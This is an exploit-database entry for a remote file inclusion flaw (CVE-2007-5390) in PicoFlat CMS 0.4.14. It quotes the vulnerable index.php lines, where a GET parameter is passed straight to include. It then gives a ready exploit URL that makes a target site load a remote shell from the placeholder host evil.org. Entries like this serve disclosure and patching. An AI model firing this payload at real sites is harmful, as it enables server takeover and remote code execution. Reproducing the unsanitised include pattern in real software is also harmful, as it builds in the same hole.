PicoFlat CMS 0.4.14 - 'index.php' Remote File Inclusion
Author: 0in
type: webapps
platform: php
port:
date_added: 2007-10-10
date_updated: 2016-10-20
verified: 1
codes: OSVDB-37686;CVE-2007-5390
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comPicoFlatCMS_18082007.0.4.5.tar.gz
#PicoFlat CMS Remote file inclusion
#f0und bY 0in
#download:http://sourceforge.net/project/showfiles.php?group_id=195156&package_id=230351&release_id=533796
#Greetings to:Dark-coders team members: Die-angel,Slim,Umbro
#Others: Joker186,Kaja,Wojto111,Rade0n
#And funny n00b-firends: Pucik and Steryd ;]
FUN BUG in index.php:
83: if (isset($_GET['pagina'])) { $pagina = $_GET['pagina']; }else{ $pagina = "news_publisher.php"; }
107: <?php include $pagina; ?>
EXPLOIT:
http://x.com/index.php?pagina=http://evil.org/shell.txt?
# milw0rm.com [2007-10-11]